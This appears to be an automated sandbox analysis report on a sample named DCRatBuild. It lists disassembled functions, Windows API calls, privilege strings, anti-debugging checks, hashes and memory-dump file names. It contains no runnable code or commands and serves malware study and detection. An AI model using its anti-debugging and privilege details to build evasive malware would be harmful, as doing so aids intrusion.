Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ad4e7a0d538db51f8a15a4730de183a7db72d30022a2a4dbd2bb9bf21ddd6980
Instruction ID: bb10b9e8759bc70c6611e666e632f7ae847dbabfacd57f8ea535ea435e194c35
Opcode Fuzzy Hash: ad4e7a0d538db51f8a15a4730de183a7db72d30022a2a4dbd2bb9bf21ddd6980
Instruction Fuzzy Hash: 21A011C22BA022BC3008220A3C02C3B0A8CC0C3F2033288AEF82A88080B8808C002830

Function 00B2E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 17e77e0059a36ad402edcbe9bc00201fd6450c0bb83238c63b12c96e76290b1b
Instruction ID: bb10b9e8759bc70c6611e666e632f7ae847dbabfacd57f8ea535ea435e194c35
Opcode Fuzzy Hash: 17e77e0059a36ad402edcbe9bc00201fd6450c0bb83238c63b12c96e76290b1b
Instruction Fuzzy Hash: 21A011C22BA022BC3008220A3C02C3B0A8CC0C3F2033288AEF82A88080B8808C002830

Function 00B2E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 549a4f266ea1d7a3f649424d4484a36bceb5cb71b08d6db7a7675a6ac3bd056c
Instruction ID: bb10b9e8759bc70c6611e666e632f7ae847dbabfacd57f8ea535ea435e194c35
Opcode Fuzzy Hash: 549a4f266ea1d7a3f649424d4484a36bceb5cb71b08d6db7a7675a6ac3bd056c
Instruction Fuzzy Hash: 21A011C22BA022BC3008220A3C02C3B0A8CC0C3F2033288AEF82A88080B8808C002830

Function 00B2E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2ffab7d28666554c401bdfb2a362a5bd6aa50a9e23bdb16a2454eb72476f6f64
Instruction ID: bb10b9e8759bc70c6611e666e632f7ae847dbabfacd57f8ea535ea435e194c35
Opcode Fuzzy Hash: 2ffab7d28666554c401bdfb2a362a5bd6aa50a9e23bdb16a2454eb72476f6f64
Instruction Fuzzy Hash: 21A011C22BA022BC3008220A3C02C3B0A8CC0C3F2033288AEF82A88080B8808C002830

Function 00B19F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00B1903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00B19F0C

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 3fde4f2a8b4183dfe905d8730b008bb4025a9f4419484828f599177ce5e20177
Instruction ID: d4bb0c87d25df4489770ca5690b1d69b7dd90950ae65a420e68c8f9068f20acc
Opcode Fuzzy Hash: 3fde4f2a8b4183dfe905d8730b008bb4025a9f4419484828f599177ce5e20177
Instruction Fuzzy Hash: 9AA0113808000A8A8E002B30CA0820C3B20FB22BC030802A8A00ACB0A2CB228A0B8A00

Function 00B2AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00B2AE72,C:\Users\user\Desktop,00000000,00B5946A,00000006), ref: 00B2AC08

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 1053ba37287918a6c222d62bf0beec8ead3ca1255f028c2fb813ce11e53f08d8
Instruction ID: 8338c1b39d705b10e2f89d437b037952abcbd996a90b01c78626b506eff2eee1
Opcode Fuzzy Hash: 1053ba37287918a6c222d62bf0beec8ead3ca1255f028c2fb813ce11e53f08d8
Instruction Fuzzy Hash: 3EA011302002808BA2000B328F0AA0EBAAABFA2B00F08C028A00080030CB30CA30AA00

Function 00B19620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00B195D6,?,?,?,?,?,00B42641,000000FF), ref: 00B1963B

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d1274cdef36c2a16a41536f1dfb5528cc1d01ebaf5edabddd6d8cfaca7920317
Instruction ID: ef0318863e0cfcf0740ad0c202f413d404bd31bff838906540e843b58a2b26d5
Opcode Fuzzy Hash: d1274cdef36c2a16a41536f1dfb5528cc1d01ebaf5edabddd6d8cfaca7920317
Instruction Fuzzy Hash: 0BF0E930085B459FDB308E24C4687D277E8EB13321F440B9ED0E2439E0D76169CD8A50

Non-executed Functions

Function 00B2C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11316: GetDlgItem.USER32(00000000,00003021), ref: 00B1135A
Part of subcall function 00B11316: SetWindowTextW.USER32(00000000,00B435F4), ref: 00B11370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B2C2B1
EndDialog.USER32(?,00000006), ref: 00B2C2C4
GetDlgItem.USER32(?,0000006C), ref: 00B2C2E0
SetFocus.USER32(00000000), ref: 00B2C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00B2C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B2C358
FindFirstFileW.KERNEL32(?,?), ref: 00B2C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B2C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B2C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B2C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B2C3D4
_swprintf.LIBCMT ref: 00B2C404

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B2C417
FindClose.KERNEL32(00000000), ref: 00B2C41E
_swprintf.LIBCMT ref: 00B2C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00B2C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B2C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B2C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B2C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B2C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B2C509
_swprintf.LIBCMT ref: 00B2C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B2C548
_swprintf.LIBCMT ref: 00B2C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00B2C5AF

Part of subcall function 00B2AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B2AF35
Part of subcall function 00B2AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00B4E72C,?,?), ref: 00B2AF84

Strings

REPLACEFILEDLG, xrefs: 00B2C247
%s %s, xrefs: 00B2C469, 00B2C58E
%s %s %s, xrefs: 00B2C3F2, 00B2C527

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: d092b290751a05b253b565aeb6c7b9fcc3a32163f56c1738d5b3278220f5cfa6
Instruction ID: 1d0f094c32dd3467b2469728d165bdc2ddf4d41937f307c96457fe330816e075
Opcode Fuzzy Hash: d092b290751a05b253b565aeb6c7b9fcc3a32163f56c1738d5b3278220f5cfa6
Instruction Fuzzy Hash: C091A272148354BBD2219BA0DC89FFF7BECEB4AB00F444859F68DD2081DB75EA448762

Function 00B16FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B16FAA
_wcslen.LIBCMT ref: 00B17013
_wcslen.LIBCMT ref: 00B17084

Part of subcall function 00B17A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B17AAB
Part of subcall function 00B17A9C: GetLastError.KERNEL32 ref: 00B17AF1
Part of subcall function 00B17A9C: CloseHandle.KERNEL32(?), ref: 00B17B00

Part of subcall function 00B1A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00B1977F,?,?,00B195CF,?,?,?,?,?,00B42641,000000FF), ref: 00B1A1F1
Part of subcall function 00B1A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B1977F,?,?,00B195CF,?,?,?,?,?,00B42641), ref: 00B1A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B17139
CloseHandle.KERNEL32(00000000), ref: 00B17155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B17298

Part of subcall function 00B19DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B173BC,?,?,?,00000000), ref: 00B19DBC
Part of subcall function 00B19DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B19E70

Part of subcall function 00B19620: CloseHandle.KERNELBASE(000000FF,?,?,00B195D6,?,?,?,?,?,00B42641,000000FF), ref: 00B1963B

Part of subcall function 00B1A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B1A325,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A501
Part of subcall function 00B1A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B1A325,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00B16FCC
UNC\, xrefs: 00B17051
\??\, xrefs: 00B1702B
SeRestorePrivilege, xrefs: 00B16FC2

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: e863f7182f2c270b2be27020752255b4f9c01efe987fcf7e043e696d08c61739
Instruction ID: 87bb6ddada7a5974b3912ee30bfc5810fc43765a58e327c8ee927206bbd1cf02
Opcode Fuzzy Hash: e863f7182f2c270b2be27020752255b4f9c01efe987fcf7e043e696d08c61739
Instruction Fuzzy Hash: 00C1E371944244AADB25DB74DC82FEEB3F8EF09300F5445D9F956E3282DB34AA848B61

Function 00B2F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B2F844
IsDebuggerPresent.KERNEL32 ref: 00B2F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B2F930
UnhandledExceptionFilter.KERNEL32(?), ref: 00B2F93A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 2f68ac24543244c79ecbbd80aeec86f118378c557366e43e98826126135bb80c
Instruction ID: fe004edfa8e34bf643b78e6f059b74593e4b629b9a20a9217b94836682335b40
Opcode Fuzzy Hash: 2f68ac24543244c79ecbbd80aeec86f118378c557366e43e98826126135bb80c
Instruction Fuzzy Hash: BC311875D052299BDB20DFA4D9897CCBBF8BF08704F1041EAE40CAB250EB719B848F44

Function 00B2E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00B2E5E8,0000001C,00B2E7DD,00000000,?,?,?,?,?,?,?,00B2E5E8,00000004,00B71CEC,00B2E86D), ref: 00B2E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B2E5E8,00000004,00B71CEC,00B2E86D), ref: 00B2E6CF

Strings

D, xrefs: 00B2E6C3

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: d4bedc24d3d793df7230aee9abe9fac699178f29ed590c434af952ee8f8c01aa
Instruction ID: e0eedd3e6d323aa950c44ede800e59af4236d24861d647b1c613c5bc2472e1e4
Opcode Fuzzy Hash: d4bedc24d3d793df7230aee9abe9fac699178f29ed590c434af952ee8f8c01aa
Instruction Fuzzy Hash: D901F7326001196BDB14DE29DC09BDD7BEAEFC4324F0CC260ED2DD7150DA38ED058680

Function 00B38EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B38FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B38FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B38FCC

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cf374078592a1d90848f80b7ac76dd764e69705b08856ec2326fe5cfaf099cce
Instruction ID: cd3e258265a20094101fb07f5f52ee21053f3c185fdd5e50eb73ceaad3a97a70
Opcode Fuzzy Hash: cf374078592a1d90848f80b7ac76dd764e69705b08856ec2326fe5cfaf099cce
Instruction Fuzzy Hash: 0731B7759012299BCB21DF68D98979DBBF4FF08710F6041EAE41CA7250EB709F858F45

Function 00B2AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B2AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00B4E72C,?,?), ref: 00B2AF84

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 9fd13cbf6311ceb314f7a49a25ebea466da1d748348e6536f8c3a550a3078aa5
Instruction ID: c8861dd54875e35276799a6cb8078a10dba7389d79087401d6cc7253e1f7c409
Opcode Fuzzy Hash: 9fd13cbf6311ceb314f7a49a25ebea466da1d748348e6536f8c3a550a3078aa5
Instruction Fuzzy Hash: 3B01713A110309AAD7109F64EC45F9A77FCFF09750F005062FA15E7190D7749A64CBA5

Function 00B16C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00B16DDF,00000000,00000400), ref: 00B16C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B16C95

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 63c8dbbe1fd375ed6ce433d7519253ec4ff74223c4e84f3d3c287e4266270327
Instruction ID: 4c2dd9524a1b528af459b424c7b012400c8c46df8b4b14d5d7e94966acb66491
Opcode Fuzzy Hash: 63c8dbbe1fd375ed6ce433d7519253ec4ff74223c4e84f3d3c287e4266270327
Instruction Fuzzy Hash: 37D0A934344300BFFA100B219C06F6A7BE9FF42F41F18C004B380E90E0DA708560A628

Function 00B2F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B2F66A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: dcaeae262245fb0fd39c68ad5391059547566b732768da817116f7f369228367
Instruction ID: eeb150e865c7d73268414748acf0a34e267cc24fb8812a243f335d52b0e14f64
Opcode Fuzzy Hash: dcaeae262245fb0fd39c68ad5391059547566b732768da817116f7f369228367
Instruction Fuzzy Hash: 11513D719006169FEB24CF58E9856BAB7F4FB48314F248979D419EB260D7749E40CF60

Function 00B1B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00B1B16B

